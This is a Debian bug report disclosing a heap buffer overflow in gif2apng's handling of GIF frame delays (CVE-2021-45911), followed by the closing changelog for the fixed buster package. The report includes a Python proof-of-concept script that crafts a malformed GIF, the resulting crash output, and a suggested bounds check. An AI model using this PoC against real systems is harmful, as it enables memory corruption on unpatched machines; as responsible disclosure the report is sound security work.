--- Begin Message ---
- To: Debian Bug Tracking System <submit@bugs.debian.org>
- Subject: gif2apng: Heap based buffer overflow in processing of delays in the main function
- From: Kolja Grassmann <koljagrassmann@mailbox.org>
- Date: Mon, 27 Dec 2021 12:44:47 +0100 (CET)
- Message-id: <711609340.530564.1640605487541@office.mailbox.org>
Package: gif2apng
Version: 1.9+srconly-3
Severity: important
Tags: security
Dear Maintainer,
There is a heap based buffer overflow in the main function of the gif2apng application. The responsible code looks as follows:
delays = (unsigned short *)malloc(frames*2);
if (delays == NULL)
return 1;
[...]
if (val == 0xF9)
{
if (fread(&size, 1, 1, f1) != 1) return 1;
if (fread(&flags, 1, 1, f1) != 1) return 1;
if (fread(&delay, 2, 1, f1) != 1) return 1;
if (fread(&t, 1, 1, f1) != 1) return 1;
if (fread(&end, 1, 1, f1) != 1) return 1;
has_t = flags & 1;
dispose_op = (flags >> 2) & 7;
if (dispose_op > 3) dispose_op = 3;
if (dispose_op == 3 && n == 0) dispose_op = 2;
if (delay > 1) delays[n] = delay;
}
The variable n is used to count the frames. The problem is that if we enter the if statement at the very end of the gif file, then n is equal to frames. This means, that the write to the delays buffer overwrites the two bytes after the delays buffer.
The following script generates a poc.gif file, that should cause a crash:
#!/bin/python3
# Writing to poc.gif
f = open("poc.gif", "wb")
sig = b"GIF87a"
w = b"\x10\x00"
h = b"\x10\x00"
flags_one = b"\x00"
bcolor = b"\x01"
aspect = b"\x01"
data = sig + w + h + flags_one + bcolor + aspect
f.write(data)
# Writting more frames to produce crash:
for i in range(0,28):
# Going into the id 0x2c path, so that there is a frame
id = b"\x2c"
w0 = b"\x01\x00"
y0 = b"\x00\x00"
x0 = b"\x00\x00"
h0 = b"\x01\x00" # Getting past our own size checks
flags_two = b"\x00"
data = id + x0 + y0 + w0 + h0 + flags_two
f.write(data)
# DecodeLZW
mincode = b"\x07"
f.write(mincode)
for i in range(0,512):
# Size value and byte we write to the heap
target_char = b"\x01" + b"A"
f.write(target_char)
# Resetting the values using "clearcode" to keep the code path as simple as possible
clear_code = b"\x01" + b"\x80"
f.write(clear_code)
# Leaving function
target_char = b"\x00"
f.write(target_char)
# Triggering the vulnerable code path
id = b"\x21"
val = b"\xf9"
size = b"\xff"
flags_two = b"\x00"
delay = b"\xff\xff"
t = b"\x00"
end = b"\x00"
data = id + val + size + flags_two + delay + t + end
f.write(data)
# Breaking out of while loop
f.write(b"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
f.close()
The generated poc.gif file causes a memory curruption on the heap when converted with the current gif2apng version:
$ gif2apng -i0 poc.gif /dev/null
gif2apng 1.9 using ZLIB
Reading 'poc.gif'...
28 frames.
Writing 'poc.png'...
28 frames.
munmap_chunk(): invalid pointer
Abgebrochen
This buffer overflow allows an attacker to write two arbitrary bytes after the delays buffer.
I did a rudimentary fix in my local version of the program by adding a boundary check to the if statement in the code:
if (val == 0xF9)
{
if (fread(&size, 1, 1, f1) != 1) return 1;
if (fread(&flags, 1, 1, f1) != 1) return 1;
if (fread(&delay, 2, 1, f1) != 1) return 1;
if (fread(&t, 1, 1, f1) != 1) return 1;
if (fread(&end, 1, 1, f1) != 1) return 1;
has_t = flags & 1;
dispose_op = (flags >> 2) & 7;
if (dispose_op > 3) dispose_op = 3;
if (dispose_op == 3 && n == 0) dispose_op = 2;
if (delay > 1 && n < frames) {
delays[n] = delay;
}
}
This fixed the crash for me locally. However I am not sure if this is a clean solution as I have no idea if this can happen in a valid image. If this code path is not possible in a valid image it might be better to stop processing the image at this point.
Best regards
Kolja
-- System Information:
Debian Release: 10.11
APT prefers oldstable-updates
APT policy: (500, 'oldstable-updates'), (500, 'oldstable')
Architecture: amd64 (x86_64)
Kernel: Linux 4.19.0-18-amd64 (SMP w/8 CPU cores)
Kernel taint flags: TAINT_OOT_MODULE, TAINT_UNSIGNED_MODULE
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8), LANGUAGE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled
Versions of packages gif2apng depends on:
ii libc6 2.28-10
ii libzopfli1 1.0.2-1
ii zlib1g 1:1.2.11.dfsg-1
gif2apng recommends no packages.
Versions of packages gif2apng suggests:
pn apng2gif <none>
-- no debconf information
--- End Message ---
--- Begin Message ---
Source: gif2apng
Source-Version: 1.9+srconly-2+deb10u1
Done: Håvard F. Aasen <havard.f.aasen@pfft.no>
We believe that the bug you reported is fixed in the latest version of
gif2apng, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 1002687@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Håvard F. Aasen <havard.f.aasen@pfft.no> (supplier of updated gif2apng package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Thu, 28 Jul 2022 23:56:21 +0200
Source: gif2apng
Architecture: source
Version: 1.9+srconly-2+deb10u1
Distribution: buster
Urgency: medium
Maintainer: Khalid El Fathi <khalid@elfathi.fr>
Changed-By: Håvard F. Aasen <havard.f.aasen@pfft.no>
Closes: 1002667 1002668 1002687
Changes:
gif2apng (1.9+srconly-2+deb10u1) buster; urgency=medium
.
* Non-maintainer upload.
* CVE-2021-45909, Closes: #1002668:
heap based buffer overflow in the DecodeLZW
* CVE-2021-45910, Closes: #1002667:
heap-based buffer overflow within the main function
* CVE-2021-45911, Closes: #1002687:
heap based buffer overflow in processing of delays in the main function
Checksums-Sha1:
77391152adfba90edcfa8e747769bcf09a62b876 2009 gif2apng_1.9+srconly-2+deb10u1.dsc
f184e5ccbdbc49945f5af571fc2b3b00b74a316b 8916 gif2apng_1.9+srconly-2+deb10u1.debian.tar.xz
b100032d2b6efbc6fbde9adcc696b1e5bc9fa5f1 5441 gif2apng_1.9+srconly-2+deb10u1_source.buildinfo
Checksums-Sha256:
ba13882e087d8f431366087ad820d514f51c5124d45195bdc7e247c857232482 2009 gif2apng_1.9+srconly-2+deb10u1.dsc
88ef009c786000079146033f91d3b6c1c3bf0d46b0674b97b076abe6ccf2f4f1 8916 gif2apng_1.9+srconly-2+deb10u1.debian.tar.xz
8afc7fb97cab9db5e611ecbff73f5ae57a9000cfbe7f69d73b4d5f39d6c5a86f 5441 gif2apng_1.9+srconly-2+deb10u1_source.buildinfo
Files:
39effd0d93ec256fc220da6a17a78892 2009 graphics optional gif2apng_1.9+srconly-2+deb10u1.dsc
d281aa7b5ed1745ad760c17582cc8c07 8916 graphics optional gif2apng_1.9+srconly-2+deb10u1.debian.tar.xz
7442a9a2d9a4874284a6d246af137e9f 5441 graphics optional gif2apng_1.9+srconly-2+deb10u1_source.buildinfo
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEEkjZVexcMh/iCHArDweDZLphvfH4FAmLvt8QACgkQweDZLphv
fH6J/hAAsAD+SGWK4pyP83w5+tB3bhJcoHE84b91rx7nvkimmMzXMj9XHpqcekzP
8tmSS1Z0Awh8lhoWeXXc6hHpcepbUyH8vibj0x3YYbaN6Bu+E+kTqK+CnzqNEDwA
3LdHWihHxM2redtyYNWkZ+pHwiuIf8/z+0ZlST8DrRtirQoTaN89i1t3AdmsnzBd
gfripsizb/DJCqf3UN+5HVPo3duZehc7jwLoc6lBcIUknZAhTohouaiCgUjFaJ5I
w7ITy3vpCk1/gX4ONr8+uKQwf1m/8kGz6311nPlT3/yTPXwarlmrlH7oeDYn0hgp
P8j8PNx1KbgmawB0Bu1UXSj+zGZ3VJdQ4IvrXw7ABPVs1dKGJxVFZP0/CMNdKxI0
d8ztDzRU3iOSJauBddNmFK8iWz3sorP8xQNMfzJQfjzRct8sfKzQMSZDpOrn+z1g
aSYaiVnjSiA2FXhzHDtfdZCxNr41Fz5YeNl24Ab9A5FUqoefRBibCI8CCOB82Rxm
7sSA0n/Y573rDwkuCB919RNx0MJXQZ1MmMHZ9vkycarEDm7Ed6mXPn7931CYEBCz
hQGaG2AfX3+AI3yocgADJwbn9OzfeRIZnV8voGZmgCLoQK5bxJZklODdEuc2U+yp
a0erC8CgV/4mC3zTgQTsEB8A2m2eAjjUZmJoIOZmSJp4CGetI/E=
=7TL4
-----END PGP SIGNATURE-----
--- End Message ---